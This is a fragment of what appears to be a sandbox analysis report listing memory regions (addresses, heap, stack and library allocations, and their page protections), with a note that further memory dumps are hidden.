26684BA0000
|
heap
|
page read and write
|
||
|
266869A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1542E450000
|
heap
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
1543026F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
1AEE85F2000
|
heap
|
page read and write
|
||
|
1542E526000
|
heap
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
7DF4B7040000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8650000
|
heap
|
page read and write
|
||
|
7FFB4AFD2000
|
trusted library allocation
|
page read and write
|
||
|
E58CFE000
|
stack
|
page read and write
|
||
|
2669CEED000
|
heap
|
page read and write
|
||
|
15430384000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B199000
|
trusted library allocation
|
page read and write
|
||
|
E590FF000
|
stack
|
page read and write
|
||
|
26682D70000
|
heap
|
page read and write
|
||
|
26694D6F000
|
trusted library allocation
|
page read and write
|
||
|
7CDCBFE000
|
stack
|
page read and write
|
||
|
15430140000
|
heap
|
page read and write
|
||
|
1AEE85FB000
|
heap
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
1542E510000
|
heap
|
page readonly
|
||
|
15440151000
|
trusted library allocation
|
page read and write
|
||
|
2669CEDB000
|
heap
|
page read and write
|
||
|
26682D79000
|
heap
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE68A5000
|
heap
|
page read and write
|
||
|
1543025B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
1542E470000
|
heap
|
page read and write
|
||
|
26686478000
|
trusted library allocation
|
page read and write
|
||
|
1AEE881A000
|
heap
|
page read and write
|
||
|
154482E7000
|
heap
|
page execute and read and write
|
||
|
7CDD1BE000
|
stack
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
7CDCEBF000
|
stack
|
page read and write
|
||
|
15448590000
|
heap
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AEE68E3000
|
heap
|
page read and write
|
||
|
1AEE8640000
|
heap
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
1AEE85AA000
|
heap
|
page read and write
|
||
|
7FFB4ADFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1542E260000
|
heap
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page read and write
|
||
|
26684D61000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
page read and write
|
||
|
1AEE8731000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
There are 399 hidden memdumps, click here to show them.